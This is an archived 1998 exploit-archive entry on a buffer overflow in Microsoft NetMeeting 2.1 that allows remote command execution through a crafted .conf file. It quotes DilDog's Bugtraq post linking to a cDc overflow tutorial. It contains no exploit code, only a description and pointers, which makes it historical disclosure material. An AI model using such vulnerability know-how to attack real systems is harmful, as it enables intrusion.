Overflow in Microsoft Netmeeting

Summary
Description: Standard overflow
Author: DilDog <dildog@L0PHT.COM>
Compromise: Remotely execute arbitrary commands on the machine of a Windows/Netmeeting user (the user must click on your Netmeeting .conf file)
Vulnerable Systems: Windows boxes running Micro$oft Netmeeting V. 2.1
Date: 16 April 1998
Notes: For a lot more information on this exploit, including a short Windows overflow tutorial, see http://www.cultdeadcow.com/cDc_files/cDc-351/ .
Details


Date: Thu, 16 Apr 1998 16:27:13 -0500
From: DilDog <dildog@L0PHT.COM>
To: BUGTRAQ@NETSPACE.ORG
Subject: The Tao of Windows Buffer Overflow

Boys, girls, lepers, and lost souls,

Venture your browsers to http://204.57.138.9/   (www.cultdeadcow.com)

There exists cDc t-file #351, an extensive document detailing 'The
Tao of Windows Buffer Overflow'. It relates a buffer overflow in
Microsoft Netmeeting 2.1, in the parlance of a street thug and with the
grace of a one-legged ostrich. In short, even yo momma could understand
it. Get it.

It tells you what you need to know, and then some.

                                        -- DilDog
                                   cDc Ninja Strike Force

This page is part of Fyodor's exploit world.